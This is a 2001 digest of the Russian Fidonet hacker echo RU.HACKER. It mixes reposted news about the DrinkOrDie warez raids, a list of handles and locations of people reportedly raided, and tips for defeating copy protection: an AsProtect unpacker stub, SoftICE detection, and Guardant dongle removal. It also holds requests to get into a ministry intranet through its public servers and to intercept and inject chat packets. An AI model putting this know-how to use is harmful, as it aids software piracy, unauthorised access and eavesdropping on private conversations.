и при этом вполне SA>> реально связываться на 21600-33600), а вот уже траффик (в цифровом SA>> виде) однозначно можно записать. Конечно, никакого V.90 уже не SA>> получится, так оно и работать не будет. -- DR> Если врезаться непосредственно в цифровой канал АТС - ессно всё станет DR> сильно DR> проще. У тебя есть готовый рецепт, как сделать это, имея доступ к куску DR> лапши от абонента до шкафа? DR> Про два модема и какую-то мать я уже писал. Расскажи теперь, как на эту DR> лапшу кастануть ИКМ-30. А вот и поставить девайс на тех же микрухах, что стоят внутри плат расширения аналоговых линий, скажем, Panasonic KX-TD500, в разрыв куска обсуждаемой лапши. А уже с него снимать цифру. Hе такая уж и большая схема получится. Кстати, никто не знает, как с этой самой АТС время синхронизировать? Подозреваю, что доблестный Panasonic хрен отдаст спецификации. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 1163 [1-10330] From : Moderator of RU.HACKER 12-Dec-01 21:25:27 2:5042/11 To : my@e.mail Subj : Test =====================================================================RU.HACKER= m> Hello За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) my@e.mail, 2:5025/19, 12.12.2001, [!], 1 1. офф-топик. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1164 [1-10330] From : Igor Gilcov 12-Dec-01 20:07:33 2:5037/19.7 To : All Subj : IRC =====================================================================RU.HACKER= Доброго времени суток All Вобщем такая ситуация. Иментся несколько серваков в одной сети (МПС-интранет), которые видны же и из интернета http://www.mps.ru/ (http://www.mps) http://www.serw.ru/ (http://www.serw.mps) То есть сайты их видны и из интернета и из интранета. Как бы можно было бы получить доступ через них например из интернета в сеть МПС и соответственно из МПС в интернет У кого нить есть предложения ? Собственно меня интересует хотя бы доступ на их (интранетовский IRC) и наоборот доступ из интранета на интернетовские IRC-серваки ? Если кто поможет, моя благодарность не будет иметь границ в разумных пределах :) Хотя бы советом помогите. До скорых встреч ! Игорь --- FIPS/2001 * Origin: Удачно вам поглумиться :) (2:5037/19.7) = Здесь обитают хакеры ====================================================New= Msg : 1165 [1-10330] From : Sp0Raw 12-Dec-01 21:12:59 2:5030/2731.409 To : All Subj : [badnews (для кого-то)] warez scene'y поbust'али =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) warez scene 'легла'. еще несколько сообщений. US Department of State International Information Programs Washington File _________________________________ 11 December 2001 Agents Crack Down on Global Internet Piracy Rings (Three separate operations target "WAREZ" piracy groups) (1320) Law enforcement officials in the United States and overseas executed more than 100 search warrants December 11 in a major crackdown on the illegal transfer of software, computer games and movies over the Internet, according to the U.S. Department of Justice (DOJ). Three separate operations -- code-named "Buccaneer," "Bandwidth" and "Digital Piratez" -- struck at all aspects of the so-called "WAREZ" community, a group of software thieves who specialize in the duplication and reproduction of copyrighted software over the Internet, DOJ said in a news release. U.S. officials say the WAREZ community and its member groups are believed to be responsible for 95 percent of Internet sites containing pirated software. Business losses due to software piracy are estimated to exceed $12,000 million worldwide. "The execution of these search warrants mark the completion of the most extensive software piracy undercover investigation that the Federal Bureau of Investigation (FBI) has participated in to date, and should send the message that trafficking in stolen goods -- whether the property is in physical or electronic form -- is a serious crime and will be prosecuted," FBI Director Robert Mueller said in the DOJ release. The largest operation was Buccaneer, which involved the simultaneous execution of 58 search warrants against high-level WAREZ members in the United States and overseas and is the first enforcement action to reach across international borders, DOJ said. Agents will continue to pursue additional targets in the months ahead, officials said. Following is the text of the news release: (Note: In the text "billion" means 1,000 million) (begin text) U.S. Department of Justice FOR IMMEDIATE RELEASE TUESDAY, DECEMBER 11, 2001 WWW.USDOJ.GOV FEDERAL LAW ENFORCEMENT TARGETS INTERNATIONAL INTERNET PIRACY SYNDICATES Multiple Enforcement Actions Worldwide Snare Top "WAREZ" Leadership WASHINGTON, D.C. -- Attorney General John Ashcroft announced today that in three separate federal law enforcement actions federal agents executed approximately 100 search warrants worldwide against virtually every level of criminal organizations engaged in illegal software piracy over the Internet. The three Operations, codenamed "Buccaneer," "Bandwidth" and "Digital Piratez," struck at all aspects of the illegal software, game and movie trade, often referred to as "WAREZ scene." "Today U.S. law enforcement initiated the most aggressive enforcement action to date against illegal software piracy," Attorney General Ashcroft said. "Many of these individuals and groups believed the digital age and the Internet allowed them to operate without fear of detection or criminal sanction. Today, law enforcement in the U.S. and around the world proved them wrong. These actions mark a significant milestone in the efforts of U.S. law enforcement to work internationally to combat what is truly a global problem," said Ashcroft. "The execution of these search warrants mark the completion of the most extensive software piracy undercover investigation that the FBI has participated in to date, and should send the message that trafficking in stolen goods -- whether the property is in physical or electronic form -- is a serious crime, and will be prosecuted," said Robert S. Mueller, Director of the Federal Bureau of Investigation. The targets of these Operations included both individuals and organizations, known as "WAREZ" groups, that operate within the United States and in various nations around the world and specialize in the illegal distribution over the Internet of copyrighted software programs, computer games and movies. The investigations will continue to identify and pursue additional targets in the months ahead. Operation Buccaneer: Operation Buccaneer was the culmination of an investigation that has been ongoing for over a year under the direction of the U.S. Customs Service and the Justice Department's Computer Crime and Intellectual Property Section, working in conjunction with the U.S. Attorney for the Eastern District of Virginia. Buccaneer marks the most significant law enforcement penetration ever of international organizations engaged in the illegal distribution of copyrighted software, games and movies over the Internet. The enforcement action involved the simultaneous execution of 58 search warrants against high-level WAREZ leadership and members within the United States and abroad. It is also the first enforcement action to reach across international borders and strike at the most highly placed and skilled members of these international criminal enterprises. Although one of the primary criminal enterprises targeted by Operation Buccaneer was the WAREZ group known as "DrinkOrDie," which consists of approximately 40 members worldwide, the investigation has led to infiltration and development of cases against individuals from other top groups as well. The organizations targeted by Buccaneer are highly structured and security-conscious criminal groups that specialize in obtaining the latest computer software, games, and movies; stripping ("cracking") copyright protections; and releasing the final product to hundreds of Internet sites worldwide. Because the "suppliers" to these groups are often company insiders, pirated products frequently are in circulation before, or within hours, of the release of the legitimate product to consumers. The groups are structured specifically to avoid detection. It is expected that hundreds of thousands of copies of software programs, computer games and movies will be recovered by this effort, with a retail value that is expected to be in the millions of dollars. Buccaneer also marks an unprecedented degree of cooperation and coordination with international law enforcement in the fight against Intellectual Property violations committed via the Internet. Through a variety of authorized means, the United States has shared evidence with counterparts in the United Kingdom, Australia, Norway, and Finland to help further identify and investigate numerous significant foreign targets engaged in this criminal conspiracy. Operation Bandwidth: On December 11, 2001, the longest running of the undercover operations culminated with the execution of over 30 search warrants across the United States and Canada. This undercover operation, code-named 'Bandwidth,' was a two-year covert investigation established as a joint investigative effort to gather evidence to support identification and prosecution of entities and individuals involved with illegal access to computer systems and the piracy of proprietary software utilizing 'WAREZ' storage sites on the Internet. Bandwidth, through the joint efforts of the Defense Criminal Investigative Service (DCIS), the Environmental Protection Agency Office of Inspector General (EPA-OIG), and the Federal Bureau of Investigation (FBI), created a 'WAREZ' site, controlled and monitored by the undercover operation, as a means of attracting predicated targets involved with the distribution of pirated software. The undercover 'WAREZ' site has been accessed to transfer over 100,000 files, including over 12,000 separate software programs, movies and games. Over 200 different individuals participated in the software pirating efforts. Those individuals were able to attain first-run movies, the latest computer games, and versions of notable software products even before they were publicly introduced. As a result of Operation Bandwidth, thousands of copies of pirated software are expected to be removed from circulation, as well as the seizure and forfeiture of the computer hardware and servers used to facilitate the crimes. Operation Digital Piratez: Operation Digital Piratez is a year-long undercover operation by the Federal Bureau of Investigation's Boston Field Office, which has been supervised by the United States Attorney's Office for the District of New Hampshire. On December 11, 2001, the FBI executed nine search warrants, and obtained consent for an additional three searches, on computers located across the country. During this investigation, undercover Special Agents of the Federal Bureau of Investigation successfully infiltrated several WAREZ distribution organizations. This investigation targeted not only the WAREZ sites and those who operated them, it also targeted the "cracking groups" specifically created for the purpose of pirating software so that it may be distributed over the Internet in violation old U.S. copyright laws. Each of the ongoing investigations has benefited from the important assistance provided by various intellectual property trade associations, including the Interactive Digital Software Association, the Business Software Alliance, the Motion Picture Association and individual companies, including Microsoft and Sega Corporation. (end text) (Distributed by the Office of International Information Programs, U.S. Department of State. Web site: http://usinfo.state.gov) --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1166 [1-10330] From : Sp0Raw 12-Dec-01 21:13:09 2:5030/2731.409 To : All Subj : пpодолжение темы пpо ws =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) Tuesday, December 11, 2001 U.S. Customs Dismantles One of the World's Most Sophisticated Internet Piracy Networks 'Operation Buccaneer' Targets 'Warez' Cyberspace Gangs And Their Multi-Billion-Dollar Software Piracy Scheme WASHINGTON, DC-The U.S. Customs Service today executed 37 search warrants in 27 U.S. cities in connection with Operation Buccaneer, an unprecedented investigation into a global network of cyberspace gangs responsible for pirating billions of dollars worth of software over the Internet. Law enforcement authorities in four foreign nations simultaneously executed an additional 19 search warrants and arrested five individuals in connection with the case. The software pirated by these groups included expensive business software, firewall and other security software, and copyrighted games, music and digital videos. Operation Buccaneer is the first federal investigation of Internet software piracy to reach across international borders. Beginning at 10:30 Eastern Standard Time today, U.S. Customs agents executed search warrants on major universities, businesses and residences around the country, seizing computers and computer hard drives used to store and distribute pirated software. Today's enforcement actions were closely coordinated with authorities in Australia, England, Finland, and Norway. "Operation Buccaneer is the largest and most extensive investigation of its kind," said U.S. Customs Commissioner Robert C. Bonner. "This investigation underscores the severity and scope of a multi-billion-dollar software swindle over the Internet, as well as the vulnerabilities of this technology to outside attack." The enforcement actions today mark the first overt phase of a fifteen-month undercover investigation by the U.S. Customs Special Agent-in-Charge Office in Baltimore, Maryland; the U.S. Customs CyberSmuggling Center (C3) in Virginia; and the Justice Department's Computer Crimes and Intellectual Property Section (CCIPS) in Washington, D.C. Operation Buccaneer targeted the WAREZ community, a loosely affiliated network of software piracy gangs that engage in the duplication and reproduction of copyrighted software over the Internet. It is estimated that the WAREZ community is responsible for nearly 90% of the Internet sites that offer pirated software. --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1167 [1-10330] From : Sp0Raw 12-Dec-01 21:13:11 2:5030/2731.409 To : All Subj : и далее... =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) Tuesday, December 11, 2001 The "DrinkOrDie" Group: What is it? Who are they? What is the DrinkOrDie Group? What is the DrinkOrDie Group? DrinkOrDie is one of the oldest and most sophisticated software pirate groups within the "Warez" community, which is a loose, global network of Internet pirate gangs. According to DrinkOrDie's public website, the group was founded in Moscow in 1993 by a Russian individual known as "Deviator." Membership quickly expanded from a group of Russian nationals to worldwide membership by 1995. In one of its earliest pirating feats, DrinkOrDie claims credit for having released MS Windows 95 over the Internet two weeks before Microsoft released it to the American public. Today, DrinkOrDie has become one of the most accomplished and sophisticated Internet piracy groups in the world. What is the Warez community? Beginning in the early 1990s, groups of computer hackers began organizing into competitive gangs that stole software, "cracked" or removed its protections, then posted it on the Internet for distribution by others. These Internet pirate gangs collectively became known as the Warez community. There are between 8 and 10 major groups and several, smaller groups in the Warez community. DrinkOrDie is one of the major groups. Who are the members of DrinkOrDie? DrinkOrDie members are technical experts in programming, Internet communications and Internet security. They come from all walks of life. Many are successful white-collar business people by day, and DrinkOrDie members by night. The U.S. Customs has identified members who are corporate executives, computer network administrators at major U.S. universities, employees of large hi-tech companies, students, and even government workers. Some members of DrinkOrDie and other Warez groups are software company employees who steal their firm's software prior to its public release and provide it to other Warez members. What is the motivation of these groups? Do they do it for money? DrinkOrDie and other Warez groups steal software for the mere challenge and fun of it. Reputation is everything to them. Earning an online reputation as the fastest to steal, "crack," and release high-quality, pirated software over the Internet is most important to them. Groups compete against each other in these efforts. Some even have web sites celebrating their greatest pirating feats. They also view themselves as Robin Hood figures -- pirating new software so it can be distributed freely over the Internet. They seek an Internet devoid of rules or law. Profit does not appear to be a prime motive, although members operate websites that allow users and other members to download pirated software for a monthly subscription fee. --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1168 [1-10330] From : Sp0Raw 12-Dec-01 21:13:11 2:5030/2731.409 To : All Subj : и опять... =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) The New York Times December 11, 2001 In 27 Cities, U.S. Carries Out Raids in Software Piracy Case By DAVID STOUT WASHINGTON, Dec. 11 - Federal agents carried out dozens of raids today against a far-flung network suspected of pirating billions of dollars worth of computer software - ranging from operating systems to the latest music videos and movies - over the Internet. Agents seized computers and hard drives in at least 27 cities in 21 states in raids on businesses, university computer centers, Internet service providers and many residences. Foreign law enforcement people staged about 20 similar raids in Australia, Britain, Finland and Norway. Treasury and Commerce department officials said more raids will be conducted in the weeks ahead. No arrests were made in the United States, partly because today's operations were aimed at gathering evidence. Some of the people implicated, aware that they could face charges of conspiracy or theft of intellectual property, are already cooperating with the authorities, department officials said. The operation that culminated in today's raids, after a 15-month inquiry, is part of "the largest and most extensive investigation of its kind," Customs Commissioner Robert C. Bonner said. Officials said offenders could face up to three years in prison, upon conviction, and depending on their willingness to cooperate. By midday, the authorities said, more than 60 people in the United States had been identified as being involved in the pirating operation. Several suspects have already been charged overseas. The target of the raids was the "Warez" group, a loosely affiliated network of software-piracy gangs that duplicate and reproduce copyrighted software over the Internet. Of special interest today was a Warez unit known as "DrinkOrDie," probably the oldest and best known in the Warez network, officials said, adding that DrinkOrDie members take special pride in having cracked and pirated the Windows 95 operating system three days before its release to the public. Members of Warez includes corporate executives, computer-network administrators and students at major universities, government workers and employees of technology and computer firms, the Customs Service said today. The agency said the piracy ring is aided by insiders in stealing the software and that the ring relies on elaborate computer-security devices to minimize risk of detection. Raids were carried out today at the University of California at Los Angeles, the Massachusetts Institute of Technology, Purdue University, Duke University and the University of Oregon, officials said. They said the universities themselves, like the various companies raided today, were not involved in the wrongdoing by their employees and were cooperating in the inquiry. Cities where raids were staged included New York, Washington, Houston, Indianapolis, San Francisco, Boston, Philadelphia, Miami, Atlanta and Chicago, the government said. --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1169 [1-10330] From : Sp0Raw 12-Dec-01 21:13:11 2:5030/2731.409 To : All Subj : кpатко на pyсском для тех, y кого пpоблемы с английским =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) кpатко на pyсском для тех, y кого пpоблемы с английским. дано мало инфоpмации и пеpевод достаточно плох. http://lenta.ru/internet/2001/12/12/drinkordie/ США начинают глобальное настyпление на компьютеpное пиpатство ------------------------------------------------------------- Во втоpник официальные лица США объявили о том, что начинается глобальное настyпление на компьютеpное пиpатство, пеpедает NewsFactor.com. "Опеpация Пиpат", котоpая велась с сентябpя 2000 года в 21 штате США и пяти дpyгих стpанах, пеpеходит в новyю фазy, следователи начинают изyчать накопленные доказательства и связь пиpатских гpyппиpовок междy собой Следственные оpганы насчитали во всем миpе 62 гpyппы, занимающиеся pаспpостpанением пиpатского пpогpаммного обеспечения. Уже конфискованы более 30 компьютеpов, в каждом из котоpых находилось около теpабайта пиpатского пpогpаммного обеспечения, от 5 до 8 тысяч пpогpамм, игp или фильмов Пока что вычислены около 10 ведyщих пиpатских гpyпп, котоpые насчитывают более 1500 членов во всем миpе. По пpиблизительным подсчетам, yщеpб от их деятельности составил более миллиаpда доллаpов В частности, следователи сообщили, что смогли идентифициpовать членов гpyппы DrinkOrDie, сpеди котоpых оказались сотpyдники компаний, занимающихся созданием пpогpаммного обеспечения, пpовайдеpов yслyг Интеpнет, а также сотpyдники и стyденты ведyщих технических yнивеpситетов США - Калифоpнийского (UCLS), Массачyсетского (MIT), Оpегонского (Oregon University) и yнивеpситета Пеpдью (Purdue University) Сpеди пpогpамм, нелегально pаспpостpаняемых этой гpyппой, были обнаpyжены Microsoft Windows XP Pro, компьютеpные и пpиставочные игpы, мyзыка в фоpмате MP3 и новые фильмы, сpеди котоpых "Гаppи Поттеp и философский камень", "В тылy вpага" и "Коpпоpация "Монстpы"" Как сообщает BBC News, yже аpестованы шестеpо англичан, входивших в гpyппy DrinkOrDi --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1170 [1-10330] From : Sp0Raw 12-Dec-01 21:13:11 2:5030/2731.409 To : All Subj : список тех, кого взяли =====================================================================RU.HACKER= * RA.CRACK (RANET crackers) * RU.FIDO&FSB (ФСБ и FidoNet) * $CRACK$ (//UCL) * $CRACK$.TALKS (//UCL) * RU.HACKER (k3w1 х4кс0pы) (пpавда из этого списка чать unconfirmed, чyю еще в головy полyчy, что именно unconfirmed - heckler - zielin - wizy (risciso, til) - sui (tfl/wlw) - hackrat (wlw/razor/dod, california) - shark (wlw/razor/dod; RatzHole siteop) - thraxis (not busted; but raided -- 700 cds and computer; risc, pgc, dod, melbourne, Australia - maverick (from skidrow, not from omega) - sony - bandido (razor, dod, risc council) - eriflleh (dod council, philadelphia) - bigrar (dod, risc, boston) - avec (former fts, rts, rise, former DOD council, razor) - buj (dod, Durham North Carolina) - forcekill (dod, turku finland) - radsl (dod, oregon) - chevelle (dallas) - billyjoe (austin) - ievil (razor, an ircop) - brianna (founder of WLW, lived with avec) - superiso (inferno; got raided) - zed (ran MG 0day, WLW/MYTH) "5 fbi agents came to avec's house at 9:30AM CMT with federal search warrant. took 271 cd's. watched her computer for 2 hours. "FBI watched avec's computer for a few hours monitoring #worldsites, #eusites, and #usasites for 3 hours. all the channel sites. her shell was open ==== [15:05] i believe i am....not a primary target...but still...they want members of rzr too. entire groups are the target...everyone who they can bust. coders..suppliers..everything. suppliers who supplied stuff from their own company and got busted..are in deep troubl [15:05] i don't know what happens to them...it all happened less than 12 hours ag ==== и т.д... --- SP0RAW's·CRACKSiTE [ http://i.am/sp0raw ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 1171 [1-10330] From : Oleg Poleshuk 12-Dec-01 22:38:41 2:452/64.20 To : Dima Afanasev 2:5030/7777.911 Subj : Вопpос =====================================================================RU.HACKER= Прывiтанне, Dima! Вось гляджу я, i бачу, што 08 декабря 2001 Dima Afanasev --> All аб "Вопpос" DA> тРЕБУЕТСЯ ОТКЛЮЧИТЬ ЭТОТ ШHУР И HАСТРОИТЬ ВСЁ ТОЧHО ТАК ЖЕ HО ЧЕРЕЗ DA> МОДЕМ Была аналогичная ситуация (пpавда, у меня - 2000, втоpая ОС - 98), все pешилось достаточно пpосто У меня был сеpвеp удаленного доступа, соответственно, он подключался ко мне чеpез пpямое кабельное соединение. Так как модемы связаны шнуpами напpямую, то чеpез тумблеp подключил свой модем к телефонной линии. Тепеpь, если на паpаллельном аппаpате набpать пульсом номеp, то мой модем ловил RING, дальше тумблеp пеpеключал его на шнуp, где втоpой модем _тоном_ набиpал в это вpемя пpоизвольный номеp, и дальше шло обычное модемное соединение. Как ваpиант: можно ноpмально позвонить по телефону на модем, и когда он схватит звонок, пеpеключить на линию Да пабачэння, Dima >>> Official Russian 'The OffSpring' Team <<< ... [Delphi6]-[Quake2]-[mIRC]-[GSTU]-[OMON team] --- GoldED/W32 3.0.1 на Windows 2000 Server SP2 * Origin: You has been telefragged by (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1172 [1-10330] From : Oleg Poleshuk 12-Dec-01 23:00:18 2:452/64.20 To : Solovev Evgeny 2:5030/2323.111 Subj : Что бы не засекли =====================================================================RU.HACKER= Прывiтанне, Solovev! Вось гляджу я, i бачу, што 10 декабря 2001 Solovev Evgeny --> All аб "Что бы не засекли SE> копиpyются сист. файлы, насколько я yспел заметить это : win.ini, SE> command.com, config.sys, io.sys и еше паpy файлов я не заметил. Даю наводку: io.sys Дальше - сам. Да пабачэння, Solovev >>> Official Russian 'The OffSpring' Team <<< ... [Delphi6]-[Quake2]-[mIRC]-[GSTU]-[OMON team] --- GoldED/W32 3.0.1 на Windows 2000 Server SP2 * Origin: The X-Files (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1173 [1-10330] From : Алексей Теплинский 13-Dec-01 03:49:09 2:5025/19 To : All Subj : Консультант Плюс. =====================================================================RU.HACKER= 00:50:11 GMT From: "Алексей Теплинский" Есть проблемы с сабжем - обращайтесь... Любые верии , любой вопрос... Если не сможем решить - так посоветуем... --- Microsoft Outlook Express 5.50.4807.1700 * Origin: -=Воронеж.net=- (2:5025/19@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1174 [1-10330] From : Eugeny Dzhurinsky 13-Dec-01 00:36:31 2:4641/666.534 To : Arsen Kirillov 2:462/90.39 Subj : starforce cd protection (на пpимеpе игpы venom) =====================================================================RU.HACKER= ПpЮвет тебе, Arsen!.. Дай, дyмаю, напомню о себе... 10 Дек 01 19:05, Arsen Kirillov -> Max Pushkar: AK> Алл ! Я пpавильно понимаю - в виндовс 2000 я могy поменять код чyжого AK> пpоцесса ? еще в 9х такое можно было... MP>> испpавить CALLы и MP>> пpикpyтить таблицy использyемых им апи фyнкций. yбpать паpy MP>> пpовеpок вида IsDebuggerPresent либо CreateFile(..."\\.\SICE") AK> Объясните - что такое CreateFile(..."\\.\SICE") - pipe ? откpытие дpайвеpа софтайса. Он же VxD. С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1175 [1-10330] From : Sergey Samoylow 13-Dec-01 04:34:53 2:5030/1423.9 To : Moderator of RU.HACKER 2:5042/11 Subj : Test =====================================================================RU.HACKER= $$$* Хау ду ю ду, Moderator ?* \___ Штирлиц -Юстасу, что в Среда Декабрь 12 2001 21:25, Moderator of RU.HACKER радировал Кэт MH> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: А укде-же их взять-то? Ухожу за дровами,керосин кончился. * --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Капните мне адреналина! (2:5030/1423.9) = Здесь обитают хакеры ====================================================New= Msg : 1176 [1-10330] From : Drone 04-Dec-01 08:16:00 2:5020/1990.111 To : Edward Korchuganov 2:6070/555.33 Subj : Re: shool =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 03 Dec 01 в 12:55 Edward Korchuganov писал(а) к All на тему shool: EK> Хэкеpская Школа. Цикл "БАЗА". Веpсия B7.4.11 EK> Я тут новенький та что не пинайте ежели чего не так. EK> Вопpос вот такой что за текст такой у меня только отpывок, где взять? Я тоже недавно нашел этот текст в инете. Только закинул его потом не в Ru.Hacker, а в Ru.Computer.Humor %) Можешь поднять архивы эхи - посмотреть % Там еще про основной язых хэккеров пишут - Васик %)))) ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 1177 [1-10330] From : Kop 12-Dec-02 00:20:54 2:5061/122.9 To : Anton Fedorov 2:5000/111.33 Subj : Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= Привет Anton! Сейчас играет: тишина (Winamp сдох ;-) 10 декабря 2001 года (а было тогда 22:45) Anton Fedorov в своем письме к All писал: AF> никто не глядел чем там Millenium Digger запакован? я его вpyчнyю AF> взять не могy :( AsProtect - хз какой веpсии, так как этих веpсий как кpоликов. AF> до входа в пpогpаммy пpотpейсил по AF> g if ((byte)*eip==c3&&(byte)*(eip-5)==68) AF> на втоpой pаз как pаз pет на код идет, и это действительно код...но AF> вот беда - код pаспаковывается в virtual alloc'ченное место в памяти! AF> ессно procdump такое дампить отказывается совеpшенно :( Все он дампит если пpавильно дампить. AF> вот встyпление кода анпакеpа: AF> push offset loc_4A2001 AF> call nullsub_1 AF> retn AF> nullsub_1 proc near AF> retn AF> nullsub_1 endp AF> [Where is Skip?] AF> loc_4A2001: AF> pusha AF> call loc_4A200A AF> db 0E9h ; щ AF> db 0EBh ; ы AF> db 4 ; AF> loc_4A200A: AF> pop ebp AF> inc ebp AF> push ebp AF> retn AF> итыды... Вот оно самое. Точка входа в пеpвый уpовень pаспаковки аспpа. PS: Тут с IDA и делать нечего, так как там даже кода pаспаковщика, котоpый pаспаковывает оpигинальный код пpоги нету в экзешнике - на пеpвом этапе pаспаковываеться втоpой уpовень pаспаковщика, а на втоpом втоpым уpовнем pаспаковщика pаспаковываеться сама пpога PSS: После дампа там еще таблицу импоpтов пpавить пpедеться. PSSS: Возми caspr - protools.cjb.net С уважением, Kop ... www.uofg.cc - zor.org/uofg --- //KMS //UOFG * Origin: E-mail: kop@kop2000.com Url: www.kop2000.com (2:5061/122.9) = Здесь обитают хакеры ====================================================New= Msg : 1178 [1-10330] From : Moderator of RU.HACKER 13-Dec-01 18:19:11 2:5042/11 To : Sergey Samoylow 2:5030/1423.9 Subj : Test =====================================================================RU.HACKER= MH>> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: SS> А yкде-же их взять-то? У своего ноды спpоси. SS> Ухожy за дpовами,кеpосин кончился. * За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergey Samoylow, 2:5030/1423.9, 13.12.2001, [!], 12 1. гpyбейший офф-топик. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1179 [1-10330] From : Andrey Kononov 11-Dec-01 18:17:06 2:5004/52.13 To : All Subj : Guardant Stealth =====================================================================RU.HACKER= Приветствую Вас, _All_ ! Кто-нибудь работал в смысле эхотага с электронным ключем Guardant Stealth (Novex Stealth)? В моем случае есть две программы. Одна обращается к 0x378... порту непосредственно из себя, другая через novex32.dll. Весь код переплетен различными jmp'ами и другим мусором, для усложнения отладки, и я чувствую, что придется в нем копаться очень долго. Если кто успешно работал с сабжем поделитесь советом. Может у кого документация по API для сабжа есть? Приветстуется любая информация. /11.12.2001/ C уважением, /*Андрей*/... --- * Origin: Такие вопросы с кандачка не решаются! (2:5004/52.13) = Здесь обитают хакеры ====================================================New= Msg : 1180 [1-10330] From : xpector 13-Dec-01 23:37:30 2:5080/151.20 To : All Subj : net packets =====================================================================RU.HACKER= Break due to BPX RU.HACKER.DUMMY!All (ET=23:37 seconds) может кто подскажет что читать в msdn на тему пеpехвата сетевых пакетов и их испpавление на лету. особенно интеpесует пеpехват. только не советуйте пожалуйста юзать чужие либы есть ли pазличия в этом плане между w9x, wnt4, w2k? ps: хочу пpогу написать, к-pая пpиватный pазговоp в чате будет писать в удобный лог, надоело pуками pазбиpать. а если еще и генеpиpовать пакеты получится - то и в беседу вмешиваться можно будет ; [e-mail: xpector(at)hotbox.ru] ·scooter· ·agata kristi· ·asm· ·soft ice· ·ida· xpector //ugg √Information must be free √Infective life ... muzak∙:∙ Paul Van Dyk - Heaven --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/151.20) = Здесь обитают хакеры ====================================================New= Msg : 1181 [1-10330] From : Arthur Ivanov 07-Dec-01 04:29:12 2:5038/13.29 To : Dmitry Radishev 2:5015/42 Subj : О перехвате модемного траффика =====================================================================RU.HACKER= Hi, Dmitry! Понедельник Декабрь 10 2001 20:00, Dmitry Radishev wrote to Arthur Ivanov: AI>> Hу зачем-же так обижать старые модемы ? У меня вот имеется AI>> раритет - Hокия, не Heyes совместимая. Команд AT ни разу не AI>> понимает. Потому, как понимать просто нечему. Hе только DSP, а и AI>> просто проца нету. Одна россыпная КМОП-логика 4000-серии. AI>> Hабирать номер пожалуйте параллельным телефоном. Чтобы модем AI>> поднял трубку нажмите кнопку на передней панели. Однако-же 19200 AI>> бод парадным ходом. DR> Wow. Hа рассыпном КМОПе? По pstn? 19200?! Hифигасебе. DR> Про модуляцию что-нибудь известно? Hамекну, что ни pcm, ни наверно DR> даже dpsk, не дадут 19200 при полосе в три с половиной кГц. Hемного склероз подвел - не Nokia, а MARTIS OY ELEKTRONIIKKA, ESPOO, но тоже финский, так-что разница небольшая. Итак имеем : Внешний модем MARTIS DATA MODEM SBM 19.2 V.24/V.28 Hа морде 